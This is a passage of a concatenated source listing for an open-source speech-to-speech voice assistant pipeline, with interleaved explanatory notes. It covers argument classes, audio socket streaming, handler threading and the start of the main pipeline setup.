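    if out is not None:
        utterance = torch.cat(out)     # buffered speech windows
print(utterance.shape if utterance is not None else None)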
669
+ # File: speech-to-speech-main/arguments_classes/chat_tts_arguments.py
670
+ from dataclasses import dataclass, field
671
+
672
+ @dataclass
673
+ class ChatTTSHandlerArguments:
674
+ chat_tts_stream: bool = field(default=True, metadata={'help': 'Whether to run TTS in streaming mode. Default is True.'})
675
+ chat_tts_device: str = field(default='cuda', metadata={'help': "The device to be used for speech synthesis. Default is 'cuda'."})
676
+ chat_tts_chunk_size: int = field(default=512, metadata={'help': 'Sets the size of the audio data chunk processed per cycle, balancing playback latency and CPU load. Default is 512.'})
677
+
678
+ # File: speech-to-speech-main/arguments_classes/language_model_arguments.py
679
+ from dataclasses import dataclass, field
680
+
681
+ @dataclass
682
+ class LanguageModelHandlerArguments:
683
+ lm_model_name: str = field(default='HuggingFaceTB/SmolLM-360M-Instruct', metadata={'help': "The pretrained language model to use. Default is 'HuggingFaceTB/SmolLM-360M-Instruct'."})
684
+ lm_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
685
+ lm_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
686
+ user_role: str = field(default='user', metadata={'help': "Role assigned to the user in the chat context. Default is 'user'."})
687
+ init_chat_role: str = field(default='system', metadata={'help': "Initial role for setting up the chat context. Default is 'system'."})
688
+ init_chat_prompt: str = field(default='You are a helpful and friendly AI assistant. You are polite, respectful, and aim to provide concise responses of less than 20 words.', metadata={'help': 'The initial chat prompt to establish context for the language model.'})
689
+ lm_gen_max_new_tokens: int = field(default=128, metadata={'help': 'Maximum number of new tokens to generate in a single completion. Default is 128.'})
690
+ lm_gen_min_new_tokens: int = field(default=0, metadata={'help': 'Minimum number of new tokens to generate in a single completion. Default is 0.'})
691
+ lm_gen_temperature: float = field(default=0.0, metadata={'help': 'Controls the randomness of the output. Set to 0.0 for deterministic (repeatable) outputs. Default is 0.0.'})
692
+ lm_gen_do_sample: bool = field(default=False, metadata={'help': 'Whether to use sampling; set this to False for deterministic outputs. Default is False.'})
693
+ chat_size: int = field(default=2, metadata={'help': 'Number of assistant-user interactions to keep for the chat. None for no limitation.'})
694
+
695
+ # File: speech-to-speech-main/arguments_classes/melo_tts_arguments.py
696
+ from dataclasses import dataclass, field
697
+
698
+ @dataclass
699
+ class MeloTTSHandlerArguments:
700
+ melo_language: str = field(default='en', metadata={'help': "The language of the text to be synthesized. Default is 'en'."})
701
+ melo_device: str = field(default='auto', metadata={'help': "The device to be used for speech synthesis. Default is 'auto'."})
702
+ melo_speaker_to_id: str = field(default='en', metadata={'help': "Mapping of speaker names to speaker IDs. Default is 'en'."})
703
+
704
+ # File: speech-to-speech-main/arguments_classes/mlx_language_model_arguments.py
705
+ from dataclasses import dataclass, field
706
+
707
+ @dataclass
708
+ class MLXLanguageModelHandlerArguments:
709
+ mlx_lm_model_name: str = field(default='mlx-community/SmolLM-360M-Instruct', metadata={'help': "The pretrained language model to use. Default is 'mlx-community/SmolLM-360M-Instruct'."})
710
+ mlx_lm_device: str = field(default='mps', metadata={'help': "The device type on which the model will run. Default is 'mps'."})
711
+ mlx_lm_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
712
+ mlx_lm_user_role: str = field(default='user', metadata={'help': "Role assigned to the user in the chat context. Default is 'user'."})
713
+ mlx_lm_init_chat_role: str = field(default='system', metadata={'help': "Initial role for setting up the chat context. Default is 'system'."})
714
+ mlx_lm_init_chat_prompt: str = field(default='You are a helpful and friendly AI assistant. You are polite, respectful, and aim to provide concise responses of less than 20 words.', metadata={'help': 'The initial chat prompt to establish context for the language model.'})
715
+ mlx_lm_gen_max_new_tokens: int = field(default=128, metadata={'help': 'Maximum number of new tokens to generate in a single completion. Default is 128.'})
716
+ mlx_lm_gen_temperature: float = field(default=0.0, metadata={'help': 'Controls the randomness of the output. Set to 0.0 for deterministic (repeatable) outputs. Default is 0.0.'})
717
+ mlx_lm_gen_do_sample: bool = field(default=False, metadata={'help': 'Whether to use sampling; set this to False for deterministic outputs. Default is False.'})
718
+ mlx_lm_chat_size: int = field(default=2, metadata={'help': 'Number of assistant-user interactions to keep for the chat. None for no limitation.'})
719
+
720
+ # File: speech-to-speech-main/arguments_classes/module_arguments.py
721
+ from dataclasses import dataclass, field
722
+ from typing import Optional
723
+
724
+ @dataclass
725
+ class ModuleArguments:
726
+ device: Optional[str] = field(default=None, metadata={'help': 'If specified, overrides the device for all handlers.'})
727
+ mode: Optional[str] = field(default='socket', metadata={'help': "The mode to run the pipeline in. Either 'local' or 'socket'. Default is 'socket'."})
728
+ local_mac_optimal_settings: bool = field(default=False, metadata={'help': 'If specified, sets the optimal settings for Mac OS. Hence whisper-mlx, MLX LM and MeloTTS will be used.'})
729
+ stt: Optional[str] = field(default='whisper', metadata={'help': "The STT to use. Either 'whisper', 'whisper-mlx', or 'paraformer'. Default is 'whisper'."})
730
+ llm: Optional[str] = field(default='transformers', metadata={'help': "The LLM to use. Either 'transformers' or 'mlx-lm'. Default is 'transformers'"})
731
+ tts: Optional[str] = field(default='parler', metadata={'help': "The TTS to use. Either 'parler', 'melo', or 'chatTTS'. Default is 'parler'"})
732
+ log_level: str = field(default='info', metadata={'help': "Provide logging level. Example: --log_level debug. Default is 'info'."})
733
+
734
+ # File: speech-to-speech-main/arguments_classes/paraformer_stt_arguments.py
735
+ from dataclasses import dataclass, field
736
+
737
+ @dataclass
738
+ class ParaformerSTTHandlerArguments:
739
+ paraformer_stt_model_name: str = field(default='paraformer-zh', metadata={'help': "The pretrained model to use. Default is 'paraformer-zh'. Can be chosen from https://github.com/modelscope/FunASR"})
740
+ paraformer_stt_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
741
+
742
+ # File: speech-to-speech-main/arguments_classes/parler_tts_arguments.py
743
+ from dataclasses import dataclass, field
744
+
745
+ @dataclass
746
+ class ParlerTTSHandlerArguments:
747
+ tts_model_name: str = field(default='ylacombe/parler-tts-mini-jenny-30H', metadata={'help': "The pretrained TTS model to use. Default is 'ylacombe/parler-tts-mini-jenny-30H'."})
748
+ tts_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
749
+ tts_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
750
+ tts_compile_mode: str = field(default=None, metadata={'help': "Compile mode for torch compile. Either 'default', 'reduce-overhead', or 'max-autotune'. Default is None (no compilation)"})
751
+ tts_gen_min_new_tokens: int = field(default=64, metadata={'help': 'Minimum number of new tokens to generate in a single completion. Default is 64.'})
752
+ tts_gen_max_new_tokens: int = field(default=512, metadata={'help': 'Maximum number of new tokens to generate in a single completion. Default is 512.'})
753
+ description: str = field(default='A female speaker with a slightly low-pitched voice delivers her words quite expressively, in a very confined sounding environment with clear audio quality. She speaks very fast.', metadata={'help': "Description of the speaker's voice and speaking style to guide the TTS model."})
754
+ play_steps_s: float = field(default=1.0, metadata={'help': 'The time interval in seconds for playing back the generated speech in steps. Default is 1.0 seconds.'})
755
+ max_prompt_pad_length: int = field(default=8, metadata={'help': 'When using compilation, the prompt has to be padded to the closest power of 2. This parameter sets the maximum power of 2 allowed.'})
756
+
757
+ # File: speech-to-speech-main/arguments_classes/socket_receiver_arguments.py
758
+ from dataclasses import dataclass, field
759
+
760
+ @dataclass
761
+ class SocketReceiverArguments:
762
+ recv_host: str = field(default='localhost', metadata={'help': "The host IP address for the socket connection. Default is 'localhost'."})
763
+ recv_port: int = field(default=12345, metadata={'help': 'The port number on which the socket server listens. Default is 12345.'})
764
+ chunk_size: int = field(default=1024, metadata={'help': 'The size of each data chunk to be sent or received over the socket. Default is 1024 bytes.'})
765
+
766
+ # File: speech-to-speech-main/arguments_classes/socket_sender_arguments.py
767
+ from dataclasses import dataclass, field
768
+
769
+ @dataclass
770
+ class SocketSenderArguments:
771
+ send_host: str = field(default='localhost', metadata={'help': "The host IP address for the socket connection. Default is 'localhost'."})
772
+ send_port: int = field(default=12346, metadata={'help': 'The port number on which the socket server listens. Default is 12346.'})
773
+
774
+ # File: speech-to-speech-main/arguments_classes/vad_arguments.py
775
+ from dataclasses import dataclass, field
776
+
777
+ @dataclass
778
+ class VADHandlerArguments:
779
+ thresh: float = field(default=0.3, metadata={'help': 'The threshold value for voice activity detection (VAD). Values typically range from 0 to 1, with higher values requiring higher confidence in speech detection.'})
780
+ sample_rate: int = field(default=16000, metadata={'help': 'The sample rate of the audio in Hertz. Default is 16000 Hz, which is a common setting for voice audio.'})
781
+ min_silence_ms: int = field(default=250, metadata={'help': 'Minimum length of silence intervals to be used for segmenting speech. Measured in milliseconds. Default is 250 ms.'})
782
+ min_speech_ms: int = field(default=500, metadata={'help': 'Minimum length of speech segments to be considered valid speech. Measured in milliseconds. Default is 500 ms.'})
783
+ max_speech_ms: float = field(default=float('inf'), metadata={'help': 'Maximum length of continuous speech before forcing a split. Default is infinite, allowing for uninterrupted speech segments.'})
784
+ speech_pad_ms: int = field(default=500, metadata={'help': 'Amount of padding added to the beginning and end of detected speech segments. Measured in milliseconds. Default is 500 ms.'})
785
+ audio_enhancement: bool = field(default=False, metadata={'help': 'improves sound quality by applying techniques like noise reduction, equalization, and echo cancellation. Default is False.'})
786
+
787
+ # File: speech-to-speech-main/arguments_classes/whisper_stt_arguments.py
788
+ from dataclasses import dataclass, field
789
+ from typing import Optional
790
+
791
+ @dataclass
792
+ class WhisperSTTHandlerArguments:
793
+ stt_model_name: str = field(default='distil-whisper/distil-large-v3', metadata={'help': "The pretrained Whisper model to use. Default is 'distil-whisper/distil-large-v3'."})
794
+ stt_device: str = field(default='cuda', metadata={'help': "The device type on which the model will run. Default is 'cuda' for GPU acceleration."})
795
+ stt_torch_dtype: str = field(default='float16', metadata={'help': 'The PyTorch data type for the model and input tensors. One of `float32` (full-precision), `float16` or `bfloat16` (both half-precision).'})
796
+ stt_compile_mode: str = field(default=None, metadata={'help': "Compile mode for torch compile. Either 'default', 'reduce-overhead', or 'max-autotune'. Default is None (no compilation)"})
797
+ stt_gen_max_new_tokens: int = field(default=128, metadata={'help': 'The maximum number of new tokens to generate. Default is 128.'})
798
+ stt_gen_num_beams: int = field(default=1, metadata={'help': 'The number of beams for beam search. Default is 1, implying greedy decoding.'})
799
+ stt_gen_return_timestamps: bool = field(default=False, metadata={'help': 'Whether to return timestamps with transcriptions. Default is False.'})
800
+ stt_gen_task: str = field(default='transcribe', metadata={'help': "The task to perform, typically 'transcribe' for transcription. Default is 'transcribe'."})
801
+ language: Optional[str] = field(default='en', metadata={'help': "The language for the conversation. \n Choose between 'en' (english), 'fr' (french), 'es' (spanish), \n 'zh' (chinese), 'ko' (korean), 'ja' (japanese), or 'None'.\n If using 'auto', the language is automatically detected and can\n change during the conversation. Default is 'en'."})
802
+
803
+ # File: speech-to-speech-main/baseHandler.py
804
+ from time import perf_counter
805
+ import logging
806
+ logger = logging.getLogger(__name__)
807
+
808
+ class BaseHandler:
809
+
810
+ def __init__(self, stop_event, queue_in, queue_out, setup_args=(), setup_kwargs={}):
811
+ self.stop_event = stop_event
812
+ self.queue_in = queue_in
813
+ self.queue_out = queue_out
814
+ self.setup(*setup_args, **setup_kwargs)
815
+ self._times = []
816
+
817
+ def setup(self):
818
+ pass
819
+
820
+ def process(self):
821
+ raise NotImplementedError
822
+
823
+ def run(self):
824
+ while not self.stop_event.is_set():
825
+ input = self.queue_in.get()
826
+ if isinstance(input, bytes) and input == b'END':
827
+ logger.debug('Stopping thread')
828
+ break
829
+ start_time = perf_counter()
830
+ for output in self.process(input):
831
+ self._times.append(perf_counter() - start_time)
832
+ if self.last_time > self.min_time_to_debug:
833
+ logger.debug(f'{self.__class__.__name__}: {self.last_time: .3f} s')
834
+ self.queue_out.put(output)
835
+ start_time = perf_counter()
836
+ self.cleanup()
837
+ self.queue_out.put(b'END')
838
+
839
+ @property
840
+ def last_time(self):
841
+ return self._times[-1]
842
+
843
+ @property
844
+ def min_time_to_debug(self):
845
+ return 0.001
846
+
847
+ def cleanup(self):
848
+ pass
849
+
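Every pipeline stage subclasses BaseHandler: run() pulls items from queue_in, streams the results of process() into queue_out, and forwards the b'END' sentinel so shutdown propagates down the chain. A toy handler showing that wiring (run from the repository root; the handler itself is made up for illustration):

from queue import Queue
from threading import Event, Thread
from baseHandler import BaseHandler

class UppercaseHandler(BaseHandler):
    # Toy stage: reads strings from queue_in and emits their uppercase form.
    def process(self, text):
        yield text.upper()

stop_event = Event()
q_in, q_out = Queue(), Queue()
handler = UppercaseHandler(stop_event, q_in, q_out)
Thread(target=handler.run).start()

q_in.put('hello')
q_in.put(b'END')            # sentinel: stops the handler and is forwarded downstream
print(q_out.get())          # 'HELLO'
print(q_out.get())          # b'END'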
850
+ # File: speech-to-speech-main/connections/local_audio_streamer.py
851
+ import threading
852
+ import sounddevice as sd
853
+ import numpy as np
854
+ import time
855
+ import logging
856
+ logger = logging.getLogger(__name__)
857
+
858
+ class LocalAudioStreamer:
859
+
860
+ def __init__(self, input_queue, output_queue, list_play_chunk_size=512):
861
+ self.list_play_chunk_size = list_play_chunk_size
862
+ self.stop_event = threading.Event()
863
+ self.input_queue = input_queue
864
+ self.output_queue = output_queue
865
+
866
+ def run(self):
867
+
868
+ def callback(indata, outdata, frames, time, status):
869
+ if self.output_queue.empty():
870
+ self.input_queue.put(indata.copy())
871
+ outdata[:] = 0 * outdata
872
+ else:
873
+ outdata[:] = self.output_queue.get()[:, np.newaxis]
874
+ logger.debug('Available devices:')
875
+ logger.debug(sd.query_devices())
876
+ with sd.Stream(samplerate=16000, dtype='int16', channels=1, callback=callback, blocksize=self.list_play_chunk_size):
877
+ logger.info('Starting local audio stream')
878
+ while not self.stop_event.is_set():
879
+ time.sleep(0.001)
880
+ print('Stopping recording')
881
+
882
+ # File: speech-to-speech-main/connections/socket_receiver.py
883
+ import socket
884
+ from rich.console import Console
885
+ import logging
886
+ logger = logging.getLogger(__name__)
887
+ console = Console()
888
+
889
+ class SocketReceiver:
890
+
891
+ def __init__(self, stop_event, queue_out, should_listen, host='0.0.0.0', port=12345, chunk_size=1024):
892
+ self.stop_event = stop_event
893
+ self.queue_out = queue_out
894
+ self.should_listen = should_listen
895
+ self.chunk_size = chunk_size
896
+ self.host = host
897
+ self.port = port
898
+
899
+ def receive_full_chunk(self, conn, chunk_size):
900
+ data = b''
901
+ while len(data) < chunk_size:
902
+ packet = conn.recv(chunk_size - len(data))
903
+ if not packet:
904
+ return None
905
+ data += packet
906
+ return data
907
+
908
+ def run(self):
909
+ self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
910
+ self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
911
+ self.socket.bind((self.host, self.port))
912
+ self.socket.listen(1)
913
+ logger.info('Receiver waiting to be connected...')
914
+ (self.conn, _) = self.socket.accept()
915
+ logger.info('receiver connected')
916
+ self.should_listen.set()
917
+ while not self.stop_event.is_set():
918
+ audio_chunk = self.receive_full_chunk(self.conn, self.chunk_size)
919
+ if audio_chunk is None:
920
+ self.queue_out.put(b'END')
921
+ break
922
+ if self.should_listen.is_set():
923
+ self.queue_out.put(audio_chunk)
924
+ self.conn.close()
925
+ logger.info('Receiver closed')
926
+
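receive_full_chunk exists because a single TCP recv() may return fewer bytes than requested; the loop keeps reading until a complete fixed-size frame has arrived, or returns None when the peer closes the connection. The same logic in isolation, exercised over a local socket pair:

import socket

def receive_full_chunk(conn, chunk_size):
    # Keep reading until exactly chunk_size bytes have been collected.
    data = b''
    while len(data) < chunk_size:
        packet = conn.recv(chunk_size - len(data))
        if not packet:
            return None
        data += packet
    return data

a, b = socket.socketpair()
a.sendall(b'\x01' * 1024)                    # one 1024-byte frame, possibly split by the kernel
print(len(receive_full_chunk(b, 1024)))      # 1024
a.close(); b.close()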
927
+ # File: speech-to-speech-main/connections/socket_sender.py
928
+ import socket
929
+ from rich.console import Console
930
+ import logging
931
+ logger = logging.getLogger(__name__)
932
+ console = Console()
933
+
934
+ class SocketSender:
935
+
936
+ def __init__(self, stop_event, queue_in, host='0.0.0.0', port=12346):
937
+ self.stop_event = stop_event
938
+ self.queue_in = queue_in
939
+ self.host = host
940
+ self.port = port
941
+
942
+ def run(self):
943
+ self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
944
+ self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
945
+ self.socket.bind((self.host, self.port))
946
+ self.socket.listen(1)
947
+ logger.info('Sender waiting to be connected...')
948
+ (self.conn, _) = self.socket.accept()
949
+ logger.info('sender connected')
950
+ while not self.stop_event.is_set():
951
+ audio_chunk = self.queue_in.get()
952
+ self.conn.sendall(audio_chunk)
953
+ if isinstance(audio_chunk, bytes) and audio_chunk == b'END':
954
+ break
955
+ self.conn.close()
956
+ logger.info('Sender closed')
957
+
958
+ # File: speech-to-speech-main/listen_and_play.py
959
+ import socket
960
+ import threading
961
+ from queue import Queue
962
+ from dataclasses import dataclass, field
963
+ import sounddevice as sd
964
+ from transformers import HfArgumentParser
965
+
966
+ @dataclass
967
+ class ListenAndPlayArguments:
968
+ send_rate: int = field(default=16000, metadata={'help': 'In Hz. Default is 16000.'})
969
+ recv_rate: int = field(default=16000, metadata={'help': 'In Hz. Default is 16000.'})
970
+ list_play_chunk_size: int = field(default=1024, metadata={'help': 'The size of data chunks (in bytes). Default is 1024.'})
971
+ host: str = field(default='localhost', metadata={'help': "The hostname or IP address for listening and playing. Default is 'localhost'."})
972
+ send_port: int = field(default=12345, metadata={'help': 'The network port for sending data. Default is 12345.'})
973
+ recv_port: int = field(default=12346, metadata={'help': 'The network port for receiving data. Default is 12346.'})
974
+
975
+ def listen_and_play(send_rate=16000, recv_rate=44100, list_play_chunk_size=1024, host='localhost', send_port=12345, recv_port=12346):
976
+ send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
977
+ send_socket.connect((host, send_port))
978
+ recv_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
979
+ recv_socket.connect((host, recv_port))
980
+ print('Recording and streaming...')
981
+ stop_event = threading.Event()
982
+ recv_queue = Queue()
983
+ send_queue = Queue()
984
+
985
+ def callback_recv(outdata, frames, time, status):
986
+ if not recv_queue.empty():
987
+ data = recv_queue.get()
988
+ outdata[:len(data)] = data
989
+ outdata[len(data):] = b'\x00' * (len(outdata) - len(data))
990
+ else:
991
+ outdata[:] = b'\x00' * len(outdata)
992
+
993
+ def callback_send(indata, frames, time, status):
994
+ if recv_queue.empty():
995
+ data = bytes(indata)
996
+ send_queue.put(data)
997
+
998
+ def send(stop_event, send_queue):
999
+ while not stop_event.is_set():
1000
+ data = send_queue.get()
1001
+ send_socket.sendall(data)
1002
+
1003
+ def recv(stop_event, recv_queue):
1004
+
1005
+ def receive_full_chunk(conn, chunk_size):
1006
+ data = b''
1007
+ while len(data) < chunk_size:
1008
+ packet = conn.recv(chunk_size - len(data))
1009
+ if not packet:
1010
+ return None
1011
+ data += packet
1012
+ return data
1013
+ while not stop_event.is_set():
1014
+ data = receive_full_chunk(recv_socket, list_play_chunk_size * 2)
1015
+ if data:
1016
+ recv_queue.put(data)
1017
+ try:
1018
+ send_stream = sd.RawInputStream(samplerate=send_rate, channels=1, dtype='int16', blocksize=list_play_chunk_size, callback=callback_send)
1019
+ recv_stream = sd.RawOutputStream(samplerate=recv_rate, channels=1, dtype='int16', blocksize=list_play_chunk_size, callback=callback_recv)
1020
+ threading.Thread(target=send_stream.start).start()
1021
+ threading.Thread(target=recv_stream.start).start()
1022
+ send_thread = threading.Thread(target=send, args=(stop_event, send_queue))
1023
+ send_thread.start()
1024
+ recv_thread = threading.Thread(target=recv, args=(stop_event, recv_queue))
1025
+ recv_thread.start()
1026
+ input('Press Enter to stop...')
1027
+ except KeyboardInterrupt:
1028
+ print('Finished streaming.')
1029
+ finally:
1030
+ stop_event.set()
1031
+ recv_thread.join()
1032
+ send_thread.join()
1033
+ send_socket.close()
1034
+ recv_socket.close()
1035
+ print('Connection closed.')
1036
+ if __name__ == '__main__':
1037
+ parser = HfArgumentParser((ListenAndPlayArguments,))
1038
+ (listen_and_play_kwargs,) = parser.parse_args_into_dataclasses()
1039
+ listen_and_play(**vars(listen_and_play_kwargs))
1040
+
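Note the factor of two in receive_full_chunk(recv_socket, list_play_chunk_size * 2): the raw streams use int16 samples, so a block of N frames occupies 2 * N bytes. For example:

import numpy as np

frames = 1024                                            # list_play_chunk_size (frames per block)
bytes_per_block = frames * np.dtype('int16').itemsize    # 2 bytes per int16 sample -> 2048
print(bytes_per_block)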
1041
+ # File: speech-to-speech-main/s2s_pipeline.py
1042
+ import logging
1043
+ import os
1044
+ import sys
1045
+ from copy import copy
1046
+ from pathlib import Path
1047
+ from queue import Queue
1048
+ from threading import Event
1049
+ from typing import Optional
1050
+ from sys import platform
1051
+ from VAD.vad_handler import VADHandler
1052
+ from arguments_classes.chat_tts_arguments import ChatTTSHandlerArguments
1053
+ from arguments_classes.language_model_arguments import LanguageModelHandlerArguments
1054
+ from arguments_classes.mlx_language_model_arguments import MLXLanguageModelHandlerArguments
1055
+ from arguments_classes.module_arguments import ModuleArguments
1056
+ from arguments_classes.paraformer_stt_arguments import ParaformerSTTHandlerArguments
1057
+ from arguments_classes.parler_tts_arguments import ParlerTTSHandlerArguments
1058
+ from arguments_classes.socket_receiver_arguments import SocketReceiverArguments
1059
+ from arguments_classes.socket_sender_arguments import SocketSenderArguments
1060
+ from arguments_classes.vad_arguments import VADHandlerArguments
1061
+ from arguments_classes.whisper_stt_arguments import WhisperSTTHandlerArguments
1062
+ from arguments_classes.melo_tts_arguments import MeloTTSHandlerArguments
1063
+ import torch
1064
+ import nltk
1065
+ from rich.console import Console
1066
+ from transformers import HfArgumentParser
1067
+ from utils.thread_manager import ThreadManager
1068
+ try:
1069
+ nltk.data.find('tokenizers/punkt_tab')
1070
+ except (LookupError, OSError):
1071
+ nltk.download('punkt_tab')
1072
+ try:
1073
+ nltk.data.find('tokenizers/averaged_perceptron_tagger_eng')
1074
+ except (LookupError, OSError):
1075
+ nltk.download('averaged_perceptron_tagger_eng')
1076
+ CURRENT_DIR = Path(__file__).resolve().parent
1077
+ os.environ['TORCHINDUCTOR_CACHE_DIR'] = os.path.join(CURRENT_DIR, 'tmp')
1078
+ console = Console()
1079
+ logging.getLogger('numba').setLevel(logging.WARNING)
1080
+
1081
+ def prepare_args(args, prefix):
1082
+ gen_kwargs = {}
1083
+ for key in copy(args.__dict__):
1084
+ if key.startswith(prefix):
1085
+ value = args.__dict__.pop(key)
1086
+ new_key = key[len(prefix) + 1:]
1087
+ if new_key.startswith('gen_'):
1088
+ gen_kwargs[new_key[4:]] = value
1089
+ else:
1090
+ args.__dict__[new_key] = value
1091
+ args.__dict__['gen_kwargs'] = gen_kwargs
1092
+
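prepare_args strips the handler prefix from each parsed argument and collects gen_* fields into a single gen_kwargs dict, so e.g. stt_model_name becomes model_name and stt_gen_max_new_tokens ends up in gen_kwargs['max_new_tokens']. A self-contained demonstration (the function body is repeated here only so the snippet runs on its own):

from copy import copy
from types import SimpleNamespace

def prepare_args(args, prefix):
    # Same logic as above: strip the handler prefix and collect gen_* fields.
    gen_kwargs = {}
    for key in copy(args.__dict__):
        if key.startswith(prefix):
            value = args.__dict__.pop(key)
            new_key = key[len(prefix) + 1:]
            if new_key.startswith('gen_'):
                gen_kwargs[new_key[4:]] = value
            else:
                args.__dict__[new_key] = value
    args.__dict__['gen_kwargs'] = gen_kwargs

ns = SimpleNamespace(stt_model_name='distil-whisper/distil-large-v3', stt_gen_max_new_tokens=128)
prepare_args(ns, 'stt')
print(ns.model_name, ns.gen_kwargs)   # distil-whisper/distil-large-v3 {'max_new_tokens': 128}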
1093
+ def main():
1094
+ parser = HfArgumentParser((ModuleArguments, SocketReceiverArguments, SocketSenderArguments, VADHandlerArguments, WhisperSTTHandlerArguments, ParaformerSTTHandlerArguments, LanguageModelHandlerArguments, MLXLanguageModelHandlerArguments, ParlerTTSHandlerArguments, MeloTTSHandlerArguments, ChatTTSHandlerArguments))
1095
+ if len(sys.argv) == 2 and sys.argv[1].endswith('.json'):
1096
+ (module_kwargs, socket_receiver_kwargs, socket_sender_kwargs, vad_handler_kwargs, whisper_stt_handler_kwargs, paraformer_stt_handler_kwargs, language_model_handler_kwargs, mlx_language_model_handler_kwargs, parler_tts_handler_kwargs, melo_tts_handler_kwargs, chat_tts_handler_kwargs) = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
1097
+ else:
1098
+ (module_kwargs, socket_receiver_kwargs, socket_sender_kwargs, vad_handler_kwargs, whisper_stt_handler_kwargs, paraformer_stt_handler_kwargs, language_model_handler_kwargs, mlx_language_model_handler_kwargs, parler_tts_handler_kwargs, melo_tts_handler_kwargs, chat_tts_handler_kwargs) = parser.parse_args_into_dataclasses()
1099
+ global logger
1100
+ logging.basicConfig(level=module_kwargs.log_level.upper(), format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
1101
+ logger = logging.getLogger(__name__)
1102
+ if module_kwargs.log_level == 'debug':
1103
+ torch._logging.set_logs(graph_breaks=True, recompiles=True, cudagraphs=True)
1104
+
1105
+ def optimal_mac_settings(mac_optimal_settings: Optional[str], *handler_kwargs):
1106
+ if mac_optimal_settings:
1107
+ for kwargs in handler_kwargs:
1108
+ if hasattr(kwargs, 'device'):
1109
+ kwargs.device = 'mps'
1110
+ if hasattr(kwargs, 'mode'):
1111
+ kwargs.mode = 'local'
1112
+ if hasattr(kwargs, 'stt'):
1113
+ kwargs.stt = 'whisper-mlx'
1114
+ if hasattr(kwargs, 'llm'):
1115
+ kwargs.llm = 'mlx-lm'
1116
+ if hasattr(kwargs, 'tts'):
1117
+ kwargs.tts = 'melo'
1118
+ optimal_mac_settings(module_kwargs.local_mac_optimal_settings, module_kwargs)
1119
+ if platform == 'darwin':
1120
+ if module_kwargs.device == 'cuda':
1121
+ raise ValueError("Cannot use CUDA on macOS. Please set the device to 'cpu' or 'mps'.")
1122
+ if module_kwargs.llm != 'mlx-lm':
1123
+ logger.warning('For macOS users, it is recommended to use mlx-lm. You can activate it by passing --llm mlx-lm.')
1124
+ if module_kwargs.tts != 'melo':
1125
+ logger.warning('If you experience issues generating the voice, consider setting the tts to melo.')
1126
+
1127
+ def overwrite_device_argument(common_device: Optional[str], *handler_kwargs):
1128
+ if common_device:
1129
+ for kwargs in handler_kwargs:
1130
+ if hasattr(kwargs, 'lm_device'):
1131
+ kwargs.lm_device = common_device
1132
+ if hasattr(kwargs, 'tts_device'):
1133
+ kwargs.tts_device = common_device
1134
+ if hasattr(kwargs, 'stt_device'):
1135
+ kwargs.stt_device = common_device
1136
+ if hasattr(kwargs, 'paraformer_stt_device'):
1137
+ kwargs.paraformer_stt_device = common_device
1138
+ overwrite_device_argument(module_kwargs.device, language_model_handler_kwargs, mlx_language_model_handler_kwargs, parler_tts_handler_kwargs, whisper_stt_handler_kwargs, paraformer_stt_handler_kwargs)
1139
+ prepare_args(whisper_stt_handler_kwargs, 'stt')
1140
+ prepare_args(paraformer_stt_handler_kwargs, 'paraformer_stt')
1141
+ prepare_args(language_model_handler_kwargs, 'lm')
1142
+ prepare_args(mlx_language_model_handler_kwargs, 'mlx_lm')
1143
+ prepare_args(parler_tts_handler_kwargs, 'tts')
1144
+ prepare_args(melo_tts_handler_kwargs, 'melo')
1145
+ prepare_args(chat_tts_handler_kwargs, 'chat_tts')
1146
+ stop_event = Event()
1147
+ should_listen = Event()
1148
+ recv_audio_chunks_queue = Queue()
1149
+ send_audio_chunks_queue = Queue()
1150
+ spoken_prompt_queue = Queue()
1151
+ text_prompt_queue = Queue()
1152
+ lm_response_queue = Queue()
1153
+ if module_kwargs.mode == 'local':
1154
+ from connections.local_audio_streamer import LocalAudioStreamer
1155
+ local_audio_streamer = LocalAudioStreamer(input_queue=recv_audio_chunks_queue, output_queue=send_audio_chunks_queue)
1156
+ comms_handlers = [local_audio_streamer]
1157
+ should_listen.set()
1158
+ else:
1159
+ from connections.socket_receiver import SocketReceiver
1160
+ from connections.socket_sender import SocketSender
1161
+ comms_handlers = [SocketReceiver(stop_event, recv_audio_chunks_queue, should_listen, host=socket_receiver_kwargs.recv_host, port=socket_receiver_kwargs.recv_port, chunk_size=socket_receiver_kwargs.chunk_size), SocketSender(stop_event, send_audio_chunks_queue, host=socket_sender_kwargs.send_host, port=socket_sender_kwargs.send_port)]
1162
+ vad = VADHandler(stop_event, queue_in=recv_audio_chunks_queue, queue_out=spoken_prompt_queue, setup_args=(should_listen,), setup_kwargs=vars(vad_handler_kwargs))
1163
+ if module_kwargs.stt == 'whisper':
1164
+ from STT.whisper_stt_handler import WhisperSTTHandler
1165
+ stt = WhisperSTTHandler(stop_event, queue_in=spoken_prompt_queue, queue_out=text_prompt_queue, setup_kwargs=vars(whisper_stt_handler_kwargs))
1166
+ elif module_kwargs.stt == 'whisper-mlx':
1167
+ from STT.lightning_whisper_mlx_handler import LightningWhisperSTTHandler
1168
+ stt = LightningWhisperSTTHandler(stop_event, queue_in=spoken_prompt_queue, queue_out=text_prompt_queue, setup_kwargs=vars(whisper_stt_handler_kwargs))
1169
+ elif module_kwargs.stt == 'paraformer':
1170
+ from STT.paraformer_handler import ParaformerSTTHandler
1171
+ stt = ParaformerSTTHandler(stop_event, queue_in=spoken_prompt_queue, queue_out=text_prompt_queue, setup_kwargs=vars(paraformer_stt_handler_kwargs))
1172
